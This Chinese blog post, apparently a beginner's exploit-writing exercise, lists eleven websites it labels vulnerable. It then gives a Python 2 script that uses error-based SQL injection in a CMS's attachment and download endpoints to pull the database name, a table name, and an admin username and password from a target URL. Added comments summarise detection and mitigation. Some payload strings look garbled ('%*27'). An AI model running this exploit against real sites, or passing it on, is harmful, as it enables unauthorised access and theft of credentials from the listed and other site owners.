漏洞网站
都是老漏洞了,我这个新手学习一下
http://www.d6xiazai.com/
http://www.zgdjzz.cn/
http://www.csuav.com/
http://www.cespc.com/
http://www.dghxjs.cn/
http://www.dqcdzz.cn/
http://www.zdblx.cn/
http://www.zgrczz.cn/
http://www.zgsykx.cn/
http://www.wjhzs.com/
http://www.szxax.com/
exp学习编写
学习漏洞原理，根据 PoC 学习自己编写 exp
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# NOTE(review): the script below is an error-based SQL-injection probe against
# one CMS endpoint, kept on this page as a study sample.  Defender summary of
# what the code itself demonstrates: a MySQL `updatexml(...)` expression is
# submitted in the `src` parameter of `m=attachment&c=attachments&a=swfupload_json`,
# and the query result is read back out of the "XPATH syntax error" text that
# `m=content&c=down&a_k=...` echoes into its response body.
# Detection: requests to `swfupload_json` whose `src` carries `updatexml(`,
# `information_schema` or `0x7e`, and responses containing "XPATH syntax error".
# Mitigation: apply the vendor fix for the affected CMS version, never build SQL
# by string concatenation from request data, and return generic error pages
# instead of raw database error messages.
# Python 2 only: uses `print` statements and `from urllib import quote`.
import sys
import requests
import re
from urllib import quote

# Per-request socket timeout in seconds.
TIMEOUT = 5
# Table name used by stages 3-5; exp() overwrites it once stage 2 has
# recovered a real table name (see the `global REQ` below).
REQ = "hex"


def payload(num, req):
    """Return the raw (pre-quoting) injection string for stage *num* (1-5).

    Args:
        num: stage number; 1 = database(), 2 = first table name of schema
            *req*, 3 = username (16 chars), 4/5 = password in two slices.
        req: schema name substituted into stage 2; stages 3-5 read the
            module-level ``REQ`` instead and ignore this argument.

    Returns:
        The payload string, or ``False`` for any stage outside 1-5.
    """
    # Each stage wraps a SELECT in updatexml() so the server-side error
    # message leaks the selected value between two '~' (0x7e) markers.
    # NOTE(review): the "%*27"/"%*20" sequences look like a rendering artifact
    # of the page rather than the author's original text — treat as-is.
    payload1 = "&id=1%*27%*20and%*20updatexml(1,concat(0x7e,(select%*20database()),0x7e),1)#&m=1&modelid=1&f=1&catid=1"
    payload2 ="&id=1%*27%*20and%*20updatexml(1,concat(0x7e,(select%*20table_name%*20from%*20information_schema.tables%*20where%*20table_schema=%*27"+req+"%*27%*20limit%*200,1),0x7e),1)#&m=1&modelid=1&f=1&catid=1"
    payload3 ="&id=1%*27%*20and%*20updatexml(1,concat(0x7e,(select%*20mid((SELECT%*20username%*20from%*20"+REQ+"%*20limit%*200,1),1,16)),0x7e),1)#&m=1&modelid=1&f=1&catid=1"
    payload4 ="&id=1%*27%*20and%*20updatexml(1,concat(0x7e,(select%*20mid((SELECT%*20password%*20from%*20"+REQ+"%*20limit%*200,1),1,16)),0x7e),1)#&m=1&modelid=1&f=1&catid=1"
    payload5 ="&id=1%*27%*20and%*20updatexml(1,concat(0x7e,(select%*20mid((SELECT%*20password%*20from%*20"+REQ+"%*20limit%*200,1),17,40)),0x7e),1)#&m=1&modelid=1&f=1&catid=1"
    if num ==1:
        return payload1
    elif num ==2:
        return payload2
    elif num ==3:
        return payload3
    elif num ==4:
        return payload4
    elif num ==5:
        return payload5
    else:
        return False


def exp(url):
    """Run the five stages against *url* and print what each one recovers.

    Args:
        url: site base URL without a trailing slash (paths are appended
            with a leading '/').

    Returns:
        ``False`` as soon as an expected cookie is missing; otherwise
        ``None`` after the loop finishes.  Results are printed, not returned.

    Side effects: rebinds the module-level ``REQ`` in stage 3; issues three
    HTTP requests per stage.
    """
    num =0
    while num < 5 :
        num += 1
        if num == 2:
            # `req` here is still the re.findall() result list left over from
            # the previous stage; the second match becomes the schema name.
            # Assumes the body matched at least twice.
            req = req[1]
            req = ''.join(req)
            pay = payload(num,req)
        elif num == 3:
            # The table name found in stage 2 is published through the
            # module-level REQ so payload() can use it in stages 3-5.
            global REQ
            req = req[1]
            REQ = ''.join(req)
            pay = payload(num,REQ)
        else:
            # Stages 1, 4 and 5 do not need a schema argument; 'hex' is a
            # placeholder that payload() ignores for those stages.
            req = 'hex'
            pay = payload(num,req)
        # A fresh session is fetched for every stage.  The cookie whose name
        # ends in '_siteid' is kept, and its 6-character prefix is reused to
        # forge a sibling '<prefix>_userid' cookie with the same value.
        cookies = {}
        ck = '{}/index.php?m=wap&a=index&siteid=1'.format(url)
        for c in requests.get(ck, timeout=TIMEOUT).cookies:
            if c.name[-7:] == '_siteid':
                cookie_head = c.name[:6]
                cookies[cookie_head + '_userid'] = c.value
                cookies[c.name] = c.value
                break
        else:
            # for/else: no '_siteid' cookie was seen, give up.
            return False
        # The URL-quoted payload goes in as `src`; the server hands back a
        # cookie ending in '_att_json' whose value is then forwarded as `a_k`
        # (presumably a server-side encoded form of `src` — confirm against
        # the CMS source).
        js = "{}/index.php?m=attachment&c=attachments&a=swfupload_json&src={}".format(url, quote(pay))
        for c in requests.get(js, cookies=cookies, timeout=TIMEOUT).cookies:
            if c.name[-9:] == '_att_json':
                enc_payload = c.value
                break
        else:
            # No '_att_json' cookie was issued, give up.
            return False
        req = url + '/index.php?m=content&c=down&a_k=' + enc_payload
        req = requests.get(req, cookies=cookies, timeout=TIMEOUT)
        #re = req.content
        # The leaked value sits between the '~' markers of the echoed MySQL
        # error.  A deployment that suppresses database errors in responses
        # yields no match here, which is the behaviour defenders want.
        req = re.findall("XPATH syntax error: '~(.*?)~' <br />",req.content)
        if req == []:
            print "column错误"
        elif num == 1:
            # Indexes the second match on every stage below; assumes the
            # error text appears at least twice in the body.
            print "database:"+req[1]
        elif num == 2:
            print "tablename:"+req[1]
        elif num == 3:
            print "username:"+req[1]
        elif num == 4:
            # First password slice is held back until stage 5 completes it.
            pw = req[1]
        elif num == 5:
            print "password:"+pw+req[1]
        else:
            print req[1]


# Entry point: the only argument is the target base URL.
exp(sys.argv[1])
执行效果
本文作者为江小悠,转载请注明。